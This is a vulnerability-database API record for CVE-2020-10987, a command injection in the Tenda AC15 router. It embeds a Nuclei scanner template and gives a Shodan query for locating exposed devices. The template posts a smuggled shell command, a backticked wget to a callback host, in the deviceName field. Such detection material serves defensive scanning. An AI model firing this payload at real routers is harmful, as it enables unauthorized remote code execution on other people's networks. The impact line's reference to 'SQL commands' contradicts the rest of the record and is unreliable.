{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-10987/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-10987/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-10987/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-10987/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-10987/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-10987"},"sightings":{"href":"/api/v1/sightings/cve-2020-10987"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.7981,"kev":true,"percentile":0.99591},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-10987.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-10987\n\ninfo:\n  name: Tenda AC15 AC1900 version 15.03.05.19 - Command Injection\n  author: pussycat0x\n  severity: critical\n  description: |\n    The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.\n  impact: |\n    Unauthenticated attackers can execute arbitrary SQL commands to access or modify database contents, potentially compromising the entire Tenda router and network configuration.\n  remediation: |\n    Upgrade to a patched firmware version or replace the affected device.\n  reference:\n    - https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-10987\n    cwe-id: CWE-78\n    epss-score: 0.7981\n    epss-percentile: 0.99591\n    cpe: cpe:2.3:o:tenda:ac15_firmware:15.03.05.19:*:*:*:*:*:*:*\n  metadata:\n    shodan-query: http.title:\"tenda wifi\"\n    max-request: 2\n    vendor: tenda\n    product: ac15_firmware\n  tags: cve,cve2020,tenda,rce,kev,unauth,vkev,vuln\n\nvariables:\n  payload: \"wget http://{{interactsh-url}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body,\"<title>Tenda WiFi\")'\n          - \"contains(content_type, 'text/html')\"\n          - \"status_code == 200\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /goform/setUsbUnload HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Accept: */*\n\n        deviceName=test`;{{payload}};`\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n# digest: 4a0a00473045022100acbadd6dbaad8e530a001aba48f73cccf2219e3a29105af1cd6e1120a6593e05022072e76a99fde04d5d81b6ae673c06058c9e6d26bc3fd173643d319e7377675bf5:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-10987"}